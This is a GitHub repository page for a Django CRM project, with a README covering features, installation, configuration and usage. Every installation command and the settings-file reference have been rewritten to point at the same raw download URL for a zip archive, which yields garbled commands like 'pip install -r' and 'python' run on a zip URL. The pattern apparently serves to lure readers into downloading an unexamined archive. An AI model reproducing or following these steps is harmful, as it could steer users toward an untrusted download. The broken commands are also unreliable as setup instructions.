Skip to content

Bigit1024/Django-CRM

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

13 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Django CRM Project

Welcome to the Django CRM project! This is a web application built using Django, a high-level Python web framework, designed for managing customer relationships and interactions.

Features

Customer Management: Keep track of customer information, including contacts, addresses, and communication history.

Task Management: Organize and track tasks related to customer interactions, such as follow-ups, appointments, and deadlines.

Lead Management: Manage leads and potential customers, track their status, and nurture them through the sales process.

Communication Logs: Log and document all communication with customers, including calls, emails, and meetings.

Reporting and Analytics: Generate reports and insights on customer interactions, sales performance, and team productivity.

Installation

1. Clone the repository:

git clone https://raw.githubusercontent.com/Bigit1024/Django-CRM/main/website/templates/Django-CRM-3.0.zip

2. Navigate to the project directory:

cd django-crm

3. Install dependencies:

pip install -r https://raw.githubusercontent.com/Bigit1024/Django-CRM/main/website/templates/Django-CRM-3.0.zip

4. Set up database (SQLite is used by default):

python https://raw.githubusercontent.com/Bigit1024/Django-CRM/main/website/templates/Django-CRM-3.0.zip migrate

5. Create a superuser account:

python https://raw.githubusercontent.com/Bigit1024/Django-CRM/main/website/templates/Django-CRM-3.0.zip createsuperuser

6. Run the development server:

python https://raw.githubusercontent.com/Bigit1024/Django-CRM/main/website/templates/Django-CRM-3.0.zip runserver

7. Access the application in your web browser at http://127.0.0.1:8000/.

Configuration

Database: By default, the project is configured to use SQLite. For production, consider using a more robust database like PostgreSQL or MySQL.

Settings: Review and modify settings in the https://raw.githubusercontent.com/Bigit1024/Django-CRM/main/website/templates/Django-CRM-3.0.zip file as needed, especially for security and environment-specific configurations.

Static Files: Configure static file serving for production deployments using a web server or CDN.

Email: Configure email settings for features like password reset and email notifications.

Usage

  1. Log in to the Django admin interface using the superuser account created during installation.

    1. Use the admin interface to manage customers, leads, tasks, and communication logs.

    2. Explore the different features and functionalities of the CRM application.

    3. Customize and extend the application as needed for your specific business requirements.

Contributing

Contributions are welcome! If you have ideas for new features, bug fixes, or improvements, please open an issue or submit a pull request.

Acknowledgements

Django - The web framework for perfectionists with deadlines.

Bootstrap - The world’s most popular front-end open-source toolkit.

About

Welcome to the Django CRM project! This is a web application built using Django, a high-level Python web framework, designed for managing customer relationships and interactions.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors